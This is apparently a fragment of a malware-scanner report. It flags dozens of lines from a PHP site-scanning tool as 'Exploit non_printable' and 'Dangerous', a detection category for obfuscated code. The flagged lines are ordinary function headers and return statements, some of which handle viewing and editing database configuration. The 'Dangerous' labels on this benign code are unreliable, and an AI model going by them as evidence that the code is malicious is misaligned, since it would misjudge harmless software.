<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$root</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1916</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_collect_sites</span><span style="color: #007700">(</span><span style="color: #0000BB">$node</span><span style="color: #007700">, &</span><span style="color: #0000BB">$sites</span><span style="color: #007700">, &</span><span style="color: #0000BB">$by_path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_prune_nested_sites</span><span style="color: #007700">(&</span><span style="color: #0000BB">$sites</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1950</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$keep</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_purpose_cell</span><span style="color: #007700">(</span><span style="color: #0000BB">$purpose</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<span class="muted">—</span>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1958</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<strong class="purpose-label">' </span><span style="color: #007700">. </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">$purpose</span><span style="color: #007700">[</span><span style="color: #DD0000">'label'</span><span style="color: #007700">]) . </span><span style="color: #DD0000">'</strong>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$real</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_scan_tree_rows</span><span style="color: #007700">(</span><span style="color: #0000BB">$node</span><span style="color: #007700">, &</span><span style="color: #0000BB">$site_num</span><span style="color: #007700">, </span><span style="color: #0000BB">$parent_id </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 197</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'p:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'n:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">build_site_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$full</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 206</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'name'</span><span style="color: #007700">=></span><span style="color: #0000BB">$name</span><span style="color: #007700">,</span><span style="color: #DD0000">'path'</span><span style="color: #007700">=></span><span style="color: #0000BB">$full</span><span style="color: #007700">,</span><span style="color: #DD0000">'cms'</span><span style="color: #007700">=></span><span style="color: #0000BB">$cms</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2081</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_looks_like_site</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$resolved</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_ENDPOINT_URL</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$cms</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">, </span><span style="color: #DD0000">'Static / Unknown'</span><span style="color: #007700">), </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_sites_from_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$roots</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ar </span><span style="color: #007700">!== </span><span style="color: #0000BB">$br </span><span style="color: #007700">? </span><span style="color: #0000BB">$ar </span><span style="color: #007700">- </span><span style="color: #0000BB">$br </span><span style="color: #007700">: </span><span style="color: #0000BB">strcmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; '</span><span style="color: #007700">, </span><span style="color: #0000BB">$errors</span><span style="color: #007700">), </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2142</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'sites' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$sites</span><span style="color: #007700">, </span><span style="color: #DD0000">'tree' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$forest</span><span style="color: #007700">, </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 216</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'sys_get_temp_dir'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_apply_merged_sites</span><span style="color: #007700">(&</span><span style="color: #0000BB">$node</span><span style="color: #007700">, </span><span style="color: #0000BB">$by_path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cms_badge</span><span style="color: #007700">(</span><span style="color: #0000BB">$cms</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-wp'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-joo'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-lar'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-oc'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-empty'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-other'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'REQUEST_URI'</span><span style="color: #007700">]) ? (string) </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'REQUEST_URI'</span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin_url'</span><span style="color: #007700">) ? </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'tools.php?page=up-to-scanner'</span><span style="color: #007700">)) : </span><span style="color: #DD0000">'#'</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span>" target="_top">К плагину</a></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 259</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$out</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_states</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 268</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_states</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_RUNTIME_BASE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$written </span><span style="color: #007700">!== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_touch_entry</span><span style="color: #007700">(&</span><span style="color: #0000BB">$states</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2857</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fetch</span><span style="color: #007700">(</span><span style="color: #0000BB">APP_ENDPOINT_URL </span><span style="color: #007700">|| </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location</span><span style="color: #007700">.</span><span style="color: #0000BB">href</span><span style="color: #007700">, {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2864</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggleConfigsPanel</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2872</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteShowDbInfo</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2901</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbView</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2904</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteEditDbConfig</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2915</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2920</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteRenderDbPreview</span><span style="color: #007700">(</span><span style="color: #0000BB">fields</span><span style="color: #007700">) {</span>
</span>
